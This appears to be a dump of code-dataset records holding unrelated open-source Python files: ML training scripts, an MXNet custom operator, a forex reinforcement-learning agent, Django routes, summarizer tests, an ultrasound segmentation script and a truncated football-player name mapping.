print_logs = True,\n                TB_log = args.log_to_tb\n            )\n\n\n\nif __name__ == \"__main__\":\n    DTargs = Config()\n    main_dt(args=DTargs)\n\n    # rewards = np.array([1,2,3,4,5])\n    # print(rewards.sum())\n    #\n    # # load and inspect the data\n    # dataset_path = 'hopper-medium-v2.pkl'\n    # with open(dataset_path, 'rb') as f:\n    #     trajectories = pickle.load(f)\n    # print(\"数据读取完毕... 
...\")\n #\n # returns = []\n # for path in trajectories:\n # print(path['observations'].shape)\n # print(path['rewards'].shape)\n # returns.append(path['rewards'].sum())\n #\n # print(np.array(returns).shape)\n\n # Reward排序\n # returns = np.array([12,333,445,6,789,991,23,76])\n # traj_lens = np.array([7,8,9,20,15,12,16,17])\n # sorted_inds = np.argsort(returns)\n # print(sorted_inds) # [3 0 6 7 1 2 4 5] #对应回报最大的索引排序...\n # num_traj = 1\n # # 最大Return对应的tp数\n # timesteps = traj_lens[sorted_inds[-1]] # 12 991\n # print(timesteps) # 12个tps获得991的累计return\n #\n # num_trajectories = 1\n #\n # len_trajs = len(returns)\n #\n # ind = len_trajs - 2\n #\n # num_timesteps = traj_lens.sum()\n #\n # while ind >= 0 and timesteps + traj_lens[sorted_inds[ind]] < num_timesteps:\n # timesteps += traj_lens[sorted_inds[ind]]\n # num_trajectories += 1\n # ind -= 1\n #\n # # 输出是除了最小的Return之外的索引列表\n # sorted_inds = sorted_inds[-num_trajectories:]\n # print(sorted_inds)\n\n\n\n","repo_name":"HzcIrving/DLRL-PlayGround","sub_path":"Offline RL/DT/DT_main.py","file_name":"DT_main.py","file_ext":"py","file_size_in_byte":16153,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"37"} +{"seq_id":"720910215","text":"import os\nimport numpy as np\nimport mxnet as mx\n\n\n# ref: http://mxnet.io/how_to/new_op.html\n\nclass RandomBagOfWordsProjection(mx.operator.CustomOp):\n \"\"\"Random projection layer for sparse bag-of-words (n-hot) inputs.\n In the sparse input, only the indices are supplied, because all the\n values are understood to be exactly 1.0.\n\n See also RandomProjection for values other than 1.0.\n \"\"\"\n\n def __init__(self, vocab_size, output_dim, random_seed=54321):\n # need_top_grad=True means this is not a loss layer\n super(RandomBagOfWordsProjection, self).__init__()\n self._vocab = vocab_size\n self._proj_dim = output_dim\n #NOTE: This naive implementation is slow and uses lots of memory.\n # Should use something smarter to not instantiate this matrix.\n rs = np.random.RandomState(seed=random_seed)\n self.W = self.random_unit_vecs(self._vocab, self._proj_dim, rs)\n\n def random_unit_vecs(self, num_vecs, num_dims, rs):\n W = rs.normal(size=(num_vecs, num_dims))\n Wlen = np.linalg.norm(W, axis=1)\n W_unit = W / Wlen[:,None]\n return W_unit\n\n def _get_mask(self, idx, in_data):\n \"\"\"Returns the mask by which to multiply the parts of the embedding layer.\n In this version, we have no weights to apply.\n \"\"\"\n mask = idx >= 0 # bool False for -1 values that should be removed. 
shape=(b,mnz)\n mask = np.expand_dims(mask,2) # shape = (b,mnz,1)\n mask = np.repeat(mask, self._proj_dim, axis=2) # shape = (b,mnz,d)\n return mask\n\n def forward(self, is_train, req, in_data, out_data, aux):\n #Note: see this run in notebooks/howto-numpy-random-proj.ipynb\n # Notation for shapes: b = batch_size, mnz = max_nonzero, d = proj_dim\n idx = in_data[0].asnumpy().astype('int32') # shape=(b,mnz)\n\n wd = self.W[idx] # shape= (b,mnz,d)\n mask = self._get_mask(idx, in_data)\n wd = np.multiply(wd,mask) # shape=(b,mnz,d), but zero'd out non-masked\n y = np.sum(wd,axis=1) # shape=(b,d)\n mxy = mx.nd.array(y) #NOTE: this hangs if the environment variables aren't set correctly\n # See https://github.com/dmlc/mxnet/issues/3813\n self.assign(out_data[0], req[0], mxy)\n\n\n@mx.operator.register(\"SparseBOWProj\")\nclass RandomBagOfWordsProjectionProp(mx.operator.CustomOpProp):\n def __init__(self, vocab_size, output_dim):\n # need_top_grad=True means this is not a loss layer\n super(RandomBagOfWordsProjectionProp, self).__init__(need_top_grad=True)\n self._kwargs = {\n 'vocab_size': int(vocab_size),\n 'output_dim': int(output_dim),\n }\n\n def list_arguments(self):\n return ['indexes']\n\n def list_outputs(self):\n return ['output']\n\n def create_operator(self, ctx, shapes, dtypes, **kwargs):\n return RandomBagOfWordsProjection(**self._kwargs)\n\n def infer_shape(self, in_shape):\n batch_size = in_shape[0][0]\n output_shape = (batch_size, self._kwargs['output_dim'])\n return in_shape, [output_shape], []\n\n\nclass SparseRandomProjection(RandomBagOfWordsProjection):\n \"\"\"Random projection of sparse input vector.\n Takes an sparse input layer, effectively in coordinate (COO) format,\n where the row number is implicit, because it's the minibatch record.\n\n See the simpler version RandomBagOfWordsProjection if all values are 1.0.\n \"\"\"\n\n def _get_mask(self, idx, in_data):\n \"\"\"Returns the mask by which to multiply the parts of the embedding layer.\n In this version, we apply the weights.\n \"\"\"\n val = in_data[1].asnumpy() # shape=(b,mnz)\n mask = idx >= 0 # bool False for -1 values that should be removed. shape=(b,mnz)\n mask = np.multiply(mask,val) # All (b,mnz)\n mask = np.expand_dims(mask,2) # shape = (b,mnz,1)\n mask = np.repeat(mask, self._proj_dim, axis=2) # shape = (b,mnz,d)\n return mask\n\n\n@mx.operator.register(\"SparseRandomProjection\")\nclass SparseRandomProjectionProp(RandomBagOfWordsProjectionProp):\n\n def list_arguments(self):\n return ['indexes', 'values']\n\n def create_operator(self, ctx, shapes, dtypes, **kwargs):\n return SparseRandomProjection(**self._kwargs)\n\n def infer_shape(self, in_shape):\n # check that indexes and values are the same shape.\n if in_shape[0] != in_shape[1]:\n raise ValueError(\"Input shapes differ. indexes:%s. values:%s. 
must be same\"\n % (str(in_shape[0]),str(in_shape[1])))\n return super(SparseRandomProjectionProp,self).infer_shape(in_shape)\n\n\nif __name__ == \"__main__\":\n print(\"Simple test of proj layer\")\n data = mx.symbol.Variable('data')\n vals = mx.symbol.Variable('vals')\n net = mx.symbol.Custom(indexes=data, values=vals, name='rproj',\n op_type='SparseRandomProjection',\n vocab_size=999, output_dim=29)\n d = mx.nd.zeros(shape=(3,100))\n v = mx.nd.ones(shape=(3,100))\n e = net.bind(ctx=mx.cpu(), args={'data':d, 'vals':v})\n e.forward()\n print(e.outputs[0].asnumpy())\n print(\"Done with proj layer test\")\n\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/recommenders/randomproj.py","file_name":"randomproj.py","file_ext":"py","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"23112203745","text":"import os\nimport socket\nimport time\nimport csv\nimport random\nimport numpy as np\nfrom collections import deque\n\nfrom pedlar.agent import Agent\nfrom rl_ml import DeepQNN\n\nHOST = '127.0.0.1'\nPORT = 65430\n\nclass RLAgent(Agent):\n name = \"RL_Agent\"\n def __init__(self,\n file_length=None,\n verbose=False, ## prints key info\n visualise=False, ## visualising with bokeh\n verbose_ticks=False, ## prints ticks\n debug=False, ## prints network actions at each step\n write=False, ## exports results to an output csv\n train=True, ## trains model, false uses current weights\n load_model=False,## loads pretrained model\n **kwargs):\n \"\"\" Initialises the agent \"\"\"\n \n self.constants = {'name': RLAgent.name,\n 'diff_step': 20,\n 'action_size': 4, ## buy, sell, cancel, do nothing\n 'mid': 100, 'mid_ma': 2000,\n 'memory': 1000, 'order_memory': 1000, \n 'verbose': verbose, 'visualise': visualise,\n 'verbose_ticks': verbose_ticks, 'debug': debug,\n 'write': write, 'train': train, 'load_model': load_model,\n 'backtest_file_length': file_length}\n \n if self.constants['write']:\n open('data/orders.csv', 'w').close()\n \n if self.constants['visualise']:\n msg = '0.0,0.0,0.0,0.0,0.0'\n self.send_to_socket(msg)\n \n ## Buffers\n self.mid_buffer = deque(maxlen=self.constants['mid'])\n self.mid_ma_buffer = deque(maxlen=self.constants['mid_ma'])\n self.ma_diff_buffer = self._get_max_ma()\n \n ## Variables\n \"\"\" Values change during training \"\"\"\n self.tick_number = 0\n self.hold = 100\n self.balance = 0\n self.order_num = 0\n self.last_order = -1\n self.order_dir = None\n self.order_length = 0\n self.mid = None\n self.bid_diff, self.ask_diff = None, None\n self.spread, self.diff = None, None\n self.last_bid, self.last_ask = None, None\n self.max_drawdown, self.max_upside = None, None\n \n self.constants['inst_state_size'] = len(self.get_inst_inputs())\n self.constants['ma_diff_buffer_size'] = self.ma_diff_buffer.shape[0]\n \n ## Load parent classes\n Agent.__init__(self, **kwargs)\n \n self.DQ = DeepQNN(self.constants)\n \n \n \n def on_tick(self, bid, ask):\n \"\"\" \n On tick handler\n Returns: None\n \"\"\"\n self.update_backtest_status()\n self.update_bid_ask_mid_spread(bid, ask)\n \n self.order_dir, self.diff = 0, 0 ## Order_dir and order diff reset (If in order then updated)\n if self.last_bid is None:\n self.last_bid, self.last_ask = self.bid, self.ask\n return\n self.bid_diff, self.ask_diff = self.bid-self.last_bid, self.ask-self.last_ask ## Gets bid,ask change since last tick\n self.last_bid, self.last_ask = self.bid, self.ask\n \n self.mid_buffer.append(self.mid) \n mid_ma = 
np.mean(np.array(self.mid_buffer))\n self.mid_ma_buffer.append(mid_ma)\n self.update_ma_diff_buffer() ## Updates the moving average difference buffer\n \n if self.hold > 0: \n self.hold -= 1\n if self.constants['verbose'] or self.constants['verbose_ticks']:\n print(\"Holding:\", self.hold)\n return\n \n if self.orders: \n ## If in order executed\n self.order_length += 1\n \n if self.constants['visualise']:\n if self.order_length % 5 == 0:\n msg = 'NA,NA,NA,{:.3f},0.0'.format(self.order_length)\n self.send_to_socket(msg)\n \n self.update_diff_and_order_dir()\n self.update_drawdown_upside()\n \n self.print_tick_status()\n \n inst = self.get_inst_inputs()\n lstm = self.ma_diff_buffer\n self.DQ.memory = self.DQ.main_loop(self.DQ.memory, inst, lstm, self.orders)\n self.act(self.DQ.variables['action'])\n return\n \n \n \n def on_bar(self, bopen, bhigh, blow, bclose):\n \"\"\" On bar handler \"\"\"\n self.update_backtest_status()\n if self.constants['verbose_ticks']:\n print(\"BAR: \", bopen, bhigh, blow, bclose)\n return\n \n \n \n def on_order(self, order):\n \"\"\" On order handler \"\"\"\n self.last_order = order.id\n self.order_num += 1\n self.order_length = 0\n\n self.order_dir = 1 if order.type == \"buy\" else -1\n self.max_drawdown, self.max_upside = self.spread * -1, self.spread * -1\n if self.constants['verbose']:\n print(f\"ORDER:\\t{self.spread * 1000: .3f}\\t{order.type}\\t{self.DQ.variables['rnd_choice']: }\")\n \n inst = self.get_inst_inputs()\n lstm = self.ma_diff_buffer\n self.DQ.order_memory = self.DQ.main_loop(self.DQ.order_memory, \n inst, lstm, self.orders, \n new_action=False) \n return\n\n \n \n def on_order_close(self, order, profit):\n \"\"\" On order close handler \"\"\"\n self.balance += profit\n text = '{:.3f},{:.3f},{:.3f},{:.3f},{:.3f}'.format(self.order_num,\n profit, \n self.balance, \n self.order_length,\n self.DQ.variables['rnd_choice'])\n inst = self.get_inst_inputs()\n lstm = self.ma_diff_buffer\n self.DQ.order_memory = self.DQ.main_loop(self.DQ.order_memory, \n inst, lstm, self.orders,\n reward=profit, done=True,\n new_action=False) \n self.order_length = 0\n \n if self.constants['verbose']:\n print(f'EXIT: {text},{self.DQ.order_epsilon: .5f},{self.DQ.empty_epsilon: .5f}')\n \n if self.constants['write']: ## Appends to csv \n with open('performance/orders.csv', 'a') as f:\n f.write(f'{text}\\n')\n \n if self.constants['visualise']: ## Visualises in bokeh \n self.send_to_socket(text)\n \n if self.constants['train']:\n self.DQ.replay(self.DQ.memory, self.DQ.batch_size * 4, \n self.DQ.model, decay=False)\n self.DQ.replay(self.DQ.order_memory, self.DQ.batch_size, \n self.DQ.model)\n \n if self.order_num % 4 == 0:\n \"\"\" Saves weights \"\"\"\n self.DQ.save(f'models/{RLAgent.name}_weights.h5',\n self.DQ.model)\n return\n \n \n \n def update_bid_ask_mid_spread(self, bid, ask):\n self.bid, self.ask = bid, ask \n self.mid = (ask + bid)/2\n self.spread = ask - bid\n return\n \n \n def update_ma_diff_buffer(self):\n mids = np.array(self.mid_ma_buffer) ## Converts deque to np.array\n mids = mids[::-self.constants['diff_step']] ## Gets data point every diff_step\n mids = np.reshape(mids, mids.shape[0]) \n diff_arr = np.diff(mids) ## Calculates difference between points\n if diff_arr.shape[0] == 0: \n ## Catches beginning if self.hold is too small so no data is in diff_arr\n return\n ## Replaces the end values of the array to be fed into the RNN\n self.ma_diff_buffer[-len(diff_arr):] = diff_arr[:] \n return\n \n \n def update_diff_and_order_dir(self):\n \"\"\" \n Updates 
current diff and order_dir (order dir) \n \"\"\"\n o = self.orders[self.last_order] #Gets current order \n if o.type ==\"buy\":\n self.diff = self.bid - o.price\n self.order_dir = 1\n else:\n self.diff = o.price - self.ask\n self.order_dir = -1\n return\n \n \n def update_drawdown_upside(self):\n if self.diff < self.max_drawdown:\n self.max_drawdown = self.diff\n if self.diff > self.max_upside:\n self.max_upside = self.diff\n return\n \n \n def get_inst_inputs(self):\n inst_inputs = [[self.bid_diff], [self.ask_diff], \n [self.spread], [self.order_dir], [self.diff],\n [self.max_drawdown], [self.max_upside]]\n return inst_inputs\n \n\n def act(self, action):\n \"\"\" \n Performs action:\n - 1 : buys \n - 2 : sells \n - 3 : closes\n - 0 : nothing\n \"\"\"\n if action == 1:\n self.buy()\n elif action == 2:\n self.sell()\n elif action == 3:\n if self.orders:\n self.close()\n else:\n pass\n return\n \n \n def _get_max_ma(self):\n \"\"\" Returns full moving average buffer - used in setup \"\"\"\n return np.zeros(self.constants['mid_ma'])[::-self.constants['diff_step']]\n \n def update_backtest_status(self):\n self.tick_number += 1\n if self.constants['backtest_file_length'] is not None:\n if self.tick_number % 100 == 0:\n print('Backtest status: {:.3f} %'.format(100 * self.tick_number \n / self.constants['backtest_file_length']))\n \n def print_tick_status(self):\n \"\"\" Displays the tick status after every tick \"\"\"\n if self.orders:\n if self.constants['verbose'] and self.constants['verbose_ticks']:\n print(\"{: .5f} |\\t{: .5f}\\t{: .5f} |\\t{: .5f}\\t{: .5f}\"\n .format(self.diff, \n self.bid_diff, self.ask_diff, \n self.max_drawdown, self.max_upside))\n else:\n if self.constants['verbose'] and self.constants['verbose_ticks']:\n print(\"{: .5f}\\t{: .5f}\"\n .format(self.bid_diff, self.ask_diff))\n return\n \n \n def send_to_socket(self, msg):\n \"\"\" \n Sends message to bokeh server \n \n reward time step - long\n reward - float\n \n order time step - long\n inst val - float\n cum val - double\n max drawdown - float\n max upside - float\n \n order length count - int \n wait length count - int\n \n rnd order exit - bool (1 = yes, 0 = no) \n rnd order entry - bool (1 = yes, 0 = no)\n \n backtest percent - float\n \"\"\"\n \n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n s.sendall(msg.encode())\n return\n \n \n \n \nif __name__ == \"__main__\": \n backtest = True\n if backtest:\n filename=\"data/1yr_backtest_GBPUSD.csv\"\n with open(filename, newline='', encoding='utf-16') as csvfile:\n reader = csv.reader(csvfile)\n length = sum(1 for row in reader)\n agent = RLAgent(file_length=length, backtest=filename)\n else:\n agent = RLAgent(username=\"algosoc\",\n password=\"1234\",\n ticker=\"tcp://icats.doc.ic.ac.uk:7000\",\n endpoint=\"http://icats.doc.ic.ac.uk\")\n agent.run()\n","repo_name":"linyang17/ASA","sub_path":"src/agent_rl.py","file_name":"agent_rl.py","file_ext":"py","file_size_in_byte":12017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"32868416863","text":"\nimport datetime\nimport os\nimport time\n\nimport pandas as pd\nimport torch\nfrom torch.utils.data import random_split\nfrom torch import nn\n\nfrom utils import *\nfrom model import *\n\n\ndef train(parser_args):\n\n print(\"loading data...\")\n df = pd.read_csv(parser_args.csv_path)\n\n myds = SoundDS(df, parser_args.data_path)\n\n num_items = len(myds)\n num_train = round(num_items * 0.8)\n num_val = num_items - num_train\n 
train_ds, val_ds = random_split(myds, [num_train, num_val])\n    print(f\"total : {num_items}, train : {num_train}, val : {num_val}\")\n\n    train_dl = torch.utils.data.DataLoader(train_ds, batch_size=parser_args.batch_size, shuffle=True)\n    val_dl = torch.utils.data.DataLoader(val_ds, batch_size=parser_args.batch_size, shuffle=False)\n\n    print(\"data loading done!\")\n\n    myModel = AudioClassifier_test()\n    device = torch.device(f\"cuda:{parser_args.gpu}\" if torch.cuda.is_available() else \"cpu\")\n    print(\"training with device :\", device)\n    # device = torch.device(\"cpu\")\n    myModel = myModel.to(device)\n    next(myModel.parameters()).device\n\n    training(myModel, train_dl, val_dl, parser_args.epochs, device)\n\n    todays_date = datetime.datetime.now()\n\n    torch.save(myModel, os.path.join(parser_args.model_dir, f'{todays_date.year}{todays_date.month:02}{todays_date.day:02}_{todays_date.hour:02}_{todays_date.minute:02}.pt'))\n    # torch.save(myModel.state_dict(), \"./20210525_model_noBN_normalize_each_file.pth\")\n\n\ndef training(model, train_dl, val_dl, num_epochs, device):\n    print('Start training ...')\n\n    cur_time = time.time()\n\n    criterion = nn.CrossEntropyLoss()\n    optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\n    scheduler = torch.optim.lr_scheduler.OneCycleLR(\n        optimizer,\n        max_lr=0.001,\n        steps_per_epoch=int(len(train_dl)),\n        epochs=num_epochs,\n        anneal_strategy=\"linear\",\n    )\n\n    for epoch in range(num_epochs):\n        running_loss = 0.0\n        correct_prediction = 0\n        total_prediction = 0\n\n        for i, data in enumerate(train_dl):\n            inputs, labels = data[0].to(device), data[1].to(device)\n\n            # inputs_m, inputs_s = inputs.mean(), inputs.std()\n            # inputs = (inputs - inputs_m) / inputs_s\n\n            optimizer.zero_grad()\n\n            outputs = model(inputs)\n            # loss = criterion(outputs, torch.max(labels, 1)[1])\n            loss = criterion(outputs, labels)\n            loss.backward()\n            optimizer.step()\n            scheduler.step()\n\n            running_loss += loss.item()\n\n            _, prediction = torch.max(outputs, 1)\n            # correct_prediction += (prediction == torch.max(labels)).sum().item()\n            correct_prediction += (prediction == labels).sum().item()\n\n            # print(f\"prediction = {prediction}\")\n            # print(f\"labels = {labels}\")\n\n            total_prediction += prediction.shape[0]\n\n            print(\n                f\"Epoch : {epoch + 1}/{num_epochs}, step : {i + 1} / {int(len(train_dl))}, loss: {running_loss / (i+1) : .5f} \\r\",\n                end=\"\",\n            )\n\n        num_batches = len(train_dl)\n        avg_loss = running_loss / num_batches\n        acc = correct_prediction / total_prediction\n\n        print(\n            f\"\\nEpoch: {epoch+1}/{num_epochs}, Loss: {avg_loss:.2f}, Accuracy: {acc:.2f} \",\n            end=\"\",\n        )\n\n        inference(model, val_dl, device)\n\n    print(f\"Finished Training, Total training time = {time.time() - cur_time}\")","repo_name":"shpark3312/sound_classification","sub_path":"code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28421004493","text":"from django.conf.urls import url\nfrom django.shortcuts import render\nfrom django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$',views.admin_home),\n url(r'^add_movie/$',views.addmovie),\n url(r'^showmovies/$',views.showmovies),\n url(r'^showmovie/$',views.showmovie),\n url(r'^updatemovie/$',views.updatemovie),\n url(r'^deletemovie/$',views.deletemovie),\n url(r'^alogout/$',views.alogout),\n path('addmovie.html',lambda request: render(request,'addmovie.html')),\n path('asettings.html',lambda request: render(request,'asettings.html')),\n path('ashowmovie.html',lambda request: render(request,'ashowmovie.html'))\n]","repo_name":"jp701/Automated-Movie-Rating-System","sub_path":"MR_SYSTEM/adminapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12857234602","text":"import unittest\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom headliner.losses import masked_crossentropy\nfrom headliner.model.basic_summarizer import BasicSummarizer\nfrom headliner.model.attention_summarizer import AttentionSummarizer\nfrom headliner.model.transformer_summarizer import TransformerSummarizer\nfrom headliner.preprocessing.dataset_generator import DatasetGenerator\nfrom headliner.preprocessing.keras_tokenizer import KerasTokenizer\nfrom headliner.preprocessing.preprocessor import Preprocessor\nfrom headliner.preprocessing.vectorizer import Vectorizer\n\n\nclass TestTraining(unittest.TestCase):\n\n def setUp(self) -> None:\n tf.random.set_seed(42)\n np.random.seed(42)\n self.data = [('a b', 'c'), ('a b c', 'd')]\n tokenizer_encoder = KerasTokenizer(lower=False, filters='')\n tokenizer_decoder = KerasTokenizer(lower=False, filters='')\n tokenizer_encoder.fit(['a b c '])\n tokenizer_decoder.fit(['c d '])\n self.vectorizer = Vectorizer(tokenizer_encoder=tokenizer_encoder,\n tokenizer_decoder=tokenizer_decoder,\n max_output_len=3)\n self.preprocessor = Preprocessor()\n batch_generator = DatasetGenerator(2)\n data_prep = [self.preprocessor(d) for d in self.data]\n data_vecs = [self.vectorizer(d) for d in data_prep]\n self.dataset = batch_generator(lambda: data_vecs)\n self.loss_func = masked_crossentropy\n\n def test_training_summarizer_attention(self) -> None:\n attention_summarizer = AttentionSummarizer(lstm_size=10,\n embedding_size=10)\n attention_summarizer.init_model(preprocessor=self.preprocessor,\n vectorizer=self.vectorizer,\n embedding_weights_encoder=None,\n embedding_weights_decoder=None)\n loss_attention = 0\n train_step = attention_summarizer.new_train_step(loss_function=self.loss_func,\n batch_size=2)\n for _ in range(10):\n for source_seq, target_seq in self.dataset.take(-1):\n loss_attention = train_step(source_seq, target_seq)\n print(str(loss_attention))\n\n self.assertAlmostEqual(1.577033519744873, float(loss_attention), 5)\n output_attention = attention_summarizer.predict_vectors('a c', '')\n expected_first_logits = np.array([-0.077805, 0.012667, 0.021359, -0.04872, 0.014989])\n np.testing.assert_allclose(expected_first_logits, output_attention['logits'][0], atol=1e-6)\n self.assertEqual(' a c ', output_attention['preprocessed_text'][0])\n self.assertEqual('d ', output_attention['predicted_text'])\n\n def test_training_summarizer_basic(self) -> None:\n basic_summarizer = BasicSummarizer(lstm_size=10,\n embedding_size=10)\n basic_summarizer.init_model(preprocessor=self.preprocessor,\n vectorizer=self.vectorizer,\n embedding_weights_encoder=None,\n embedding_weights_decoder=None)\n loss = 0\n train_step = 
basic_summarizer.new_train_step(loss_function=self.loss_func,\n batch_size=2)\n for e in range(0, 10):\n for source_seq, target_seq in self.dataset.take(-1):\n loss = train_step(source_seq, target_seq)\n\n self.assertAlmostEqual(1.5850255489349365, float(loss), 5)\n output = basic_summarizer.predict_vectors('a c', '')\n expected_first_logits = np.array([-0.00621 , 0.007277, 0.015851, -0.034298, 0.044253])\n np.testing.assert_allclose(expected_first_logits, output['logits'][0], atol=1e-6)\n self.assertEqual(' a c ', output['preprocessed_text'][0])\n self.assertEqual('', output['predicted_text'])\n\n def test_training_summarizer_transformer(self):\n transformer_summarizer = TransformerSummarizer(num_heads=1,\n num_layers=1,\n feed_forward_dim=20,\n embedding_size=10,\n dropout_rate=0,\n max_prediction_len=3)\n transformer_summarizer.init_model(preprocessor=self.preprocessor,\n vectorizer=self.vectorizer,\n embedding_weights_encoder=None,\n embedding_weights_decoder=None)\n loss_transformer = 0\n train_step = transformer_summarizer.new_train_step(loss_function=self.loss_func,\n batch_size=2)\n for e in range(0, 10):\n for source_seq, target_seq in self.dataset.take(-1):\n loss_transformer = train_step(source_seq, target_seq)\n print(str(loss_transformer))\n\n self.assertAlmostEqual(1.3421446084976196, float(loss_transformer), 5)\n output_transformer = transformer_summarizer.predict_vectors('a c', '')\n expected_first_logits = np.array([-0.514366, 1.416978, -0.679771, -0.488442, -0.022602])\n np.testing.assert_allclose(expected_first_logits, output_transformer['logits'][0], atol=1e-6)\n self.assertEqual(' a c ', output_transformer['preprocessed_text'][0])\n self.assertEqual('c c c', output_transformer['predicted_text'])\n","repo_name":"as-ideas/headliner","sub_path":"tests/test_training.py","file_name":"test_training.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","stars":231,"dataset":"github-code","pt":"21"} +{"seq_id":"40427959288","text":"import cv2, pydicom, nrrd, os, itertools\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom numpy import asarray\r\nfrom matplotlib import pyplot as plt\r\n\r\nroot = 'D:/renalUS/data/'\r\n\r\ndef path(directory):\r\n dcm_list, nrrd_list = [], []\r\n IDs = os.listdir(directory)\r\n for ID in IDs:\r\n files = os.listdir(directory + ID)\r\n for file in files:\r\n f_name, file_ext = os.path.splitext (file)\r\n if file_ext == '.nrrd':\r\n path_nrrd = directory + ID + '/' + file\r\n name_dcm = f_name [5:] +'.dcm'\r\n path_dcm = directory + ID + '/' + name_dcm\r\n nrrd_list.append (path_nrrd)\r\n dcm_list.append (path_dcm)\r\n return dcm_list, nrrd_list\r\n\r\n\r\ndef segmentation(path_dcm, path_nrrd):\r\n # convert dcm --> array --> RGB_jpg --> gray_jpg --> array\r\n dcm_to_array = pydicom.dcmread(path_dcm)\r\n array = dcm_to_array.pixel_array.astype(float)\r\n array = (np.maximum(array, 0)/array.max()) * 255.0\r\n array = np.uint8(array)\r\n jpg = Image.fromarray(array)\r\n jpg.save('D:/l-0.jpg')\r\n jpg = cv2.imread ('D:/l-0.jpg')\r\n gray_jpg = cv2.cvtColor(jpg, cv2.COLOR_BGR2GRAY)\r\n array_2D = asarray (gray_jpg)\r\n \r\n # nrrd --> array --> transposing\r\n mask_array, header = nrrd.read(path_nrrd)\r\n mask_array = np.reshape (mask_array, (800, 600))\r\n mask_array = np.transpose(mask_array)\r\n \r\n # apply nrrd to dcm in array type\r\n ROI = np.multiply(mask_array, array_2D)\r\n \r\n # show the segmentation\r\n segmented = ROI/ ROI.max() * 255.0\r\n plt.imshow(segmented, interpolation = 'none')\r\n 
plt.show()\r\n    return segmented\r\n\r\ncol =[]\r\nfor i in range (800):\r\n    col.append('c' + str(i+1))\r\n    \r\ndef barplot (row_1D_array):\r\n    total = np.sum(row_1D_array, dtype = np.float32)\r\n    print (total)\r\n    plt.bar (col, row_1D_array, color ='maroon')\r\n    #plt.ylim((0, 255))\r\n    plt.show()\r\n\r\ndef boxplot (array_2D):\r\n    array_1D =[]\r\n    for i in range (600):\r\n        for j in range (800):\r\n            array_1D.append(array_2D[i][j])\r\n    plt.figure(figsize=(10, 7))\r\n    plt.boxplot(array_1D)\r\n    plt.show()\r\n    return array_1D\r\n    \r\ndef exp_value (array_2D):\r\n    exp = np.multiply(array_2D, array_2D)\r\n    return exp\r\n\r\ndef delete_markers (ROI):\r\n    _, _, mean = overview(ROI)\r\n    for i in range (600):\r\n        for j in range (800):\r\n            if ROI[i][j] >= 230:\r\n                ROI[i][j] = mean\r\n    return ROI\r\ndef overview (ROI):\r\n    num_pixel = 0\r\n    total_value_pixel = 0\r\n    for i in range (600):\r\n        for j in range (800):\r\n            if ROI[i][j] > 0:\r\n                num_pixel += 1\r\n                total_value_pixel += ROI[i][j]\r\n    mean_value_pixel = total_value_pixel/num_pixel\r\n    return num_pixel, total_value_pixel, mean_value_pixel\r\n    \r\n\r\n    \r\n    \r\n    \r\n    \r\n    \r\n","repo_name":"binhyc11/Renal-US-images","sub_path":"plot_segmentation.py","file_name":"plot_segmentation.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"9639553435","text":"import requests\nimport pandas as pd\n\nfrom bs4 import BeautifulSoup\n\ndef remap_player(player):\n    mapping = {\n        'Stephane Wilfried Singo': 'Wilfried Stephane Singo',\n        'Destiny Udogie': 'Iyenoma Destiny Udogie',\n        'Matias Vina': 'Matias Viña',\n        'Anderson Felipe': 'Felipe Anderson',\n        'Nicolò Zaniolo': 'Nicolo Zaniolo',\n        'Alvaro Morata': 'Álvaro Morata',\n        'Ledesma Rodriguez Pedro': 'Pedro',\n        'Diego Godin': 'Diego Godín',\n        'Theo Hernandez': 'Theo Hernández',\n        'Peter Stojanovic': 'Petar Stojanovic',\n        'Marten Roon De': 'Marten de Roon',\n        'Lobo Sandro Alex': 'Alex Sandro',\n        'Matthijs Ligt De': 'Matthijs de Ligt',\n        'Davide Faraoni': 'Marco Faraoni',\n        'Alvaro Odriozola': 'Álvaro Odriozola',\n        'Jens Larsen Stryger': 'Jens Stryger Larsen',\n        'Ruslan Malinovskyi': 'Ruslan Malinovskiy',\n        'Nahitan Nandez': 'Nahitan Nández',\n        'Oliver Giroud': 'Olivier Giroud',\n        'Pepe Reina': 'José Reina',\n        'Lorenzo Silvestri De': 'Lorenzo De Silvestri',\n        'Konstantinos Manolas': 'Kostas Manolas',\n        'Aleksej Miranchuk': 'Aleksey Miranchuk',\n        'Duvan Zapata': 'Duván Zapata',\n        'Arnor Sigurdsson': 'Arnór Sigurdsson',\n        ' Hamed Traorè': 'Hamed Junior Traore',\n        'Galvao Pedro Joao': 'João Pedro',\n        'Rafael Leao': 'Rafael Leão',\n        'Nwankwo Tochukwu Simeon': 'Simy',\n        'Jaime Cuadrado': 'Juan Cuadrado',\n        'Giovanni Lorenzo Di': 'Giovanni Di Lorenzo',\n        'Leonardo Spinazzola': 'Leonardo Spinazzola',\n        'Maria Josè Callejon': 'José Callejón',\n        'Franck Kessiè': 'Franck Kessié',\n        'Alconchel Alberto Luis': 'Luis Alberto',\n        'Nicolas Gonzalez': 'Nicolás González',\n        'Lautaro Martinez': 'Lautaro Martínez',\n        \"M'Bala Nzola\": \"M'Bala Nzola\",\n        'Silva da Luiz Danilo': 'Danilo',\n        'Stefan Vrij De': 'Stefan de Vrij',\n        'Joaquin Correa': 'Joaquín Correa',\n        'Patricio Rui': 'Rui Patrício',\n        'Berat Djimsiti': 'Berat Gjimshiti',\n        'Roger Ibanez': 'Ibañez',\n        'Ramos Felipe 